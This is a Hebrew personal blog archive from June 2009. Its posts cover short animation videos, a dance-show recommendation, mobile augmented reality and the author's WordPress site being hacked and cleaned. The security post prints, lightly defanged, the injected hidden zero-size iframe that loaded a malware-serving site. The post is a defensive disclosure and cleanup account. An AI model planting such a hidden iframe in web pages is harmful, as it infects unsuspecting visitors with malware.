חודש: יוני 2009

היום בצינור – מאנימציית פתקיות לסיפור אהבה יפני

קשה לקרוא לזה פוסט, אולי פוסטון. אך שני הסרטים הללו העלו חיוך על שפתי, ונראה לי ראוי להביאם כאן.

הראשון לקח 3 חודשים לעשייה, 4 ימים לצלם ו- 6000 פתקים דביקים. סרט מחווה לכל מי שאי פעם נדרש לדד-ליין והשאיר לעצמו פתקים-דביקים בשביל תזכורת

השני (לחלוטין לא קשור לראשון) הוא סרטון אהבה בסגנון אנימה. הזוי ומקסים כאחד, באופן שמזכיר לנו עד כמה אפשר להתפרע כשמשלבים דמיון ואנימציה

(תודות לווינט למדור הקישורים המועדפים שהציפו בפני את שני הסרטונים הללו)

מופע המחול "אויסטר" של עינבל פינטו ואבשלום פולק – המלצה חמה

לפוסט הזה יש מטרה אחת ויחידה – לחלוק איתכם שאם אי פעם תרצו ללכת אתם (או לקחת מישהו) למופע ריקוד – תקחו אותם ל"אויסטר".

רקע – אני ועולם הריקוד בארץ: מאז שהכרתי את אישתי (לעתיד) דבורה, נתוודעתי לעולם המחול והריקוד (בארץ ובכלל). שמות שלפני כן לא עניינו אותי כמו אוהד נהרין ולהקת בת שבע, הקיבוצית, מחול במדבר ואדמה, ורטיגו, יסמין גודר, נעה דר ועוד ועוד – פתאום נהפכו שגורים בבית ומוכרים לי.

לאהוב ריקוד: ועם זאת, יש מרחק בין להכיר ללאהוב. הרבה מההופעות שזכיתי לראות (בעקבות ההזמנות של דבורה) הצדיקו את המשפט "כל הופעות המחול ארוכות מידי". זו הייתה התחושה שלי ב- 90% מההופעות שראיתי, הן לרוב הרשימו אותי ביכולת של הרקנים ולפעמים גם היו תנועות שמצאתי מעניינות. אבל מכאן ללשבת שעה ולצפות באנשים זזים (לרוב למוזיקה לא מספיק מעניינת) יש מרחק – לרוב מצאתי את עצמי פשוט משתעמם.

היוצא מן הכלל: ועל רקע כל זה אוייסטר זורח כמו שוב דבר שהיה לפניו (למעט "אחד מי יודע" מדקא-דנס של אוהד נהרין). אחרי שעה של צפייה במופע "אוייסטר" של עינבל פינטו ואבשלום פולק, נשענתי לכיוונה של זוגתי ושאלתי אותי בקול עצוב "זהו? כבר נגמר?"

אני לא אתאמץ לתאר לכם את ההופעה. במקום זאת אסכם ואומר שהעולם שהמופע מצייר (בתנועה, מוזיקה, תחפושות ואפקטים) הוא קסום ושובה לב. הדימוי היחיד שיש לי אליו הוא התחושה שהייתה לי כשראיתי את ה"מסע המופלא" של מיאזאקי (סרט אנימה מקסים ביופיו)

רוצים עוד מהתחושה? אני מזמינכם להביט באסופת התמונות הבאה (לרקע מוזיקה מהמופע)

ואם החלטתם שאתם מוכרחים עוד, אז אני מפנה אתכם לשני מאמרים של אהובתי דבורה. הראשון התפרסם בג'רוזלם פוסט והשני הוא ראיון (פודקסט) עם היוצרים, תהנו:

סרטון בו מלבישים מציאות-מדומה על גבי היום יום באמצעות מכשיר סלולרי? (סרטון של 2 דקות)

הרעיון של מציאות מולבשת (augmented reality) נמצא באיזור כבר הרבה זמן. ממש לפני 3 חודשים הבאתי 4 סרטונים המציגים טכנולוגיות שעשויות לאפשר את החיבור הזה בפוסט עתידנו הקרוב – החיבור בין העולם הגשמי למידע מהאינטרנט (מהרצאת טד ועד החזון של מייקרוסופט).
והנה הבוקר נתקלתי בטוויט של שרון המציג את סרטון שמציע גישה נוספת למציאות מולבשת – על ידי שימוש במכשיר הסלולרי. הנה הוא לפניכם:

החיבור שבין סלולארי למציאות מולבשת איננו חדש וכבר הופיע בכמה התייחסויות. אבל זו הפעם הראשונה שנתקלתי בסרטון פירסומי המציג מוצר (פחות או יותר) מוגמר, שמציג את החיבור. בסרטון אפשר לראות אדם משתמש במצלמת הסלולרי שלו על פני איזור שמולו. המצלמה לוכדת את תמונת האיזור ומלבישה עליו שכבות מידע מסוגים שונים (איפה יש בתים, מה המרחק מהם, מה אפשר לקנות בחלקם וכן הלאה). וזה הרי חלק חשוב במהפכה הגיאו-מרחבית עליה כתבתי לפני חודש.

מכאן עד למוצר שמתפשט לכלל האוכלוסיה יש עוד דרך: יש פה אתגרים טכנולוגיים ואתגרים חברתיים.
בצד הטכנולוגי, יש את השאלה כיצד לעמוד בעומס החישובי של יצירת המאשאפ (העירבוב) הזה של הווירטואלי עם המציאותי. אפשר לדמיין שלפני שנצטרך שהסלולארים שלנו יחזיקו מחשבים מאד חזקים, יפתרו את הבעיה הזו באמצעות טכנולוגיות ענן. מסיבה זו טכנולוגיות כמו זו של און-לייב (שבכלל מיועדת למשחקי מחשב על הענן) הן כל כך מעניינות. כך שהבעיה הזו מתחלקת לפתרון החומרה (האפשרות להעביר יותר מידע דרך השרת הסלולרית) ופתרון התוכנה (כיצד ליצור מיחשוב ענן יעיל להלבשת העולם הווירטואלי על העולם האמיתי).
בצד החברתי, כנראה מצוי עיקר הקאטצ'. פה מועלית השאלה כיצד יוצרים ממשק שימוש שאנשים יוכלו להתמודד איתו בקלות ואינטואטיביות. ויותר מזה, כיצד יוצרים רשתות-חברתיות שיאפשרו איסוף של מידע גיאוגרפי במקביל לשאר סוגי המידע שהן אוספות.

תחושת הבטן שלי אומרת שלא נראה תפוצה רחבה של המוצר הזה השנה. אבל מצד שני שההפצה של הטכנולוגיה הזו תהיה מהירה יותר מכפי שאנו מצפים – ואז יום אחד נתעורר ונראה ששילבנו את הווירטואלי למציאותי ונהיה מאד מופתעים (כמו שהיום אנשים פתאום גילו שיש איזה דבר בשם טוויטר שהשפיע על איראן, איזה פלא…)

אבטחה בוורדפרס – כיצד להסיר iframe injections באמצעות SSH

http://weblogtoolscollection.com/archives/2009/06/15/security-and-anti-spam-plugins-for-wordpress/(זהירות: פוטס טכני לחובבי הוורדפרס מבינינו)

אז לאחר שגיליתי שהבלוג שלי נדבק בווירוס, יצאתי לחפש אחר פתרון ובפוסט זה אני מביע תודה לכל אלו שעזרו ומקווה לסייע לאחרים בעתיד שיתקלו בבעיות דומות.

הבעיה הייתה שאיכשהו (כנראה פריצה לאחד היוזרים של ה- FTP של השרת שלי) איזשהו בוט נכנס לשרת והכניס לקבצים שבשרת שורת קוד שטוענת אתר (iframe) בתוך כל אחד מהאתרים שלי, האתר הזה מתקין איזשהו סוס טרויאני (לא ברור איזה), וזיהם את רוב (אם לא כל) הקבצים שעל השרת.

הקוד הזדוני נראה כך (הדרך שבה הדבקתי אותו אמורה לסרס את פעולת הקוד, אבל לא הייתי ממליץ להכנס ללינק ללא אנטיווירוס מותקן):

<iframe src="http:// m-analytics . net /qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

כיצד מצאתי את הפתרון:

  1. פניתי לחברי בפייסבוק, טוויטר, קבוצת העזרה של וורדפרס העולמית וקבוצת הדיון של וורדפרס בעברית לבקש עזרה. אף אחד לא נתן את הפתרון המדויק, אבל שילוב של הפתרונות הביא לסיום הפרשה. אני רוצה להודות לדותן מזור ואיתן ברקט (ששילוב הטיפים שלהם הוא שפתר לי את רוב התעלומה – ראו סעיף 5), לצפריר ריהן (שנתן טיפים כלליים טובים),  לתומר כהן, לאלעד (על הרצון הטוב), ניצן בן-נון (שנתן כיוונים מעולים והפתרון שלו כמעט עבד, אבל לא הצלחתי ליישם אותו כלשונו), לדוד גור ולאריק וגליה (שרצו לעזור, אבל לא הספיקו לעזור לפני האחרים).  (דוד, ניצן וגליה – איני יודע מה הלינקים לבלוגים שלכם, תשלחו ותקבלו)
  2. כדי לוודא בכל שלב של הניסוי האם אני מצליח או לא, השתמשתי באתר "הסר מסכות טפילים" שמגלה האם יש באתר כלשהו עדות ללינקים חבויים או דברים שמעלים חשד של פריצה לאתר.
  3. התקנתי על הוורדפרס את התוסף WordPress Exploit Scanner אליו הגעתי דרך הפוסט Security And Anti-spam Plugins For WordPress – זהו תוסף שמאפשר לגלות קבצים "מזוהמים" בוורדפרס. מה שאיפשר לי לזהות איפה נמצאו הלינקים שיש להוריד.
  4. מצאתי באינטרנט מישהו אחר שנתן הוראות (שלא בדיוק עבדו) לפתרון בעיה דומה של החדרת קוד זדוני של iframe, http://fieldsmarshall.com/htmliframe-inf-wordpress-infection/ שם קיבלתי אישור שהכיוון הכללי הוא הנכון.
  5. קיבלתי הפניה לאתר (המצויין) http://www.commandlinefu.com שאפשר בתוכו למצוא אוצרות בלומים של איך לעשות מה עם פקודות ב- SSH (שזה בדיוק מה שנזדקקתי לו) (את זה שלח לי דותן, ובשילוב עם העזרה הכללית בקוד הרג'אקס דרך איתן – הבעיה נפטרה)

מהו הפתרון

להמשיך לקרוא אבטחה בוורדפרס – כיצד להסיר iframe injections באמצעות SSH

הבלוג שלי נדבק בווירוס (בידקו את המחשבים שלכם!)

קוראים יקרים שלום.
נודע לי היום שהאתר שלי (ועוד אתרים אחרים באחסון שלי), נחשפו לפריצה אשר החדירה קוד זדוני שמתקין ווירוס אצל גולשים המבקרים באתר.
לאלו מכם שיש אנטיווירוס מותקן ומעודכן על המחשב, תגלו שהוא חוסם את הווירוס בכניסתכם לאתר.
לאלו מכם שאין אנטיווירוס (נו נו נו לכם!), אל תלכו, תרוצו, להתקין אנטי ווירוס (כבר למעלה משנתיים אני משתמש מרוצה  של AVAST, הדרך הקלה להוריד אותו היא מהלינק כאן)

לאנשי הוורדפרס מבינינו, הנה איך שגיליתי (ואיך שאני מתכנן) לפתור את הבעיה:
1) הגילוי – חברים עדכנו אותי (במייל ודרך טוויטר) שהאנטיווירוס שלהם מתלונן בכניסתו לאתר.
2) החקירה – לאחרונה פורסם פוסט בנושא פלאגיני אבטחה לוורדפרס (הנה הלינק) בבלוג לו אני מנוי. לאחר סקירה זריזה שלו החלטתי להתקין את הפלאגין WordPress Exploit Scanner והרצתי אותו לסרוק ולמצוא חריגות. הוא הצליח לאתר קוד זדוני שמושתל בקבצים ראשיים באתר שלי (קמצי ה- index וכן הלאה).
3) הפניה לעזרה – פניתי לשירות האחסון שלי (site5) בבקשה מהם לשחזר גיבוי קודם לקבצים ומחיקת כל משתמשי ה- FTP שלי. הם צפויים לעשות זאת בשעות הקרובות ואז אראה אם זה הספיק (אם לא, אני אצטרך לעבור ולמחוק את כל הלינקים שהושתלו בקבצי האתר. ואז אני אצטרך לחפש דרך לבצע search and replace המוני על האתר מבלי להוריד אלי את כל הקבצים מהשרת ואז להעלות אותם – הידד…)
4) הפתרון – עוד לא בוצע. כשיהיה, יהיה…. (ואני אעדכן אותו כאן)

ולסיום, שירות התמיכה של site5 שלחו לי שורה של "המלצות חמות" על מה כדאי שאבצע כדי להבטיח שלא יפרצו לאתר שלי, אני מצרף אותם כאן להנאתכם
להמשיך לקרוא הבלוג שלי נדבק בווירוס (בידקו את המחשבים שלכם!)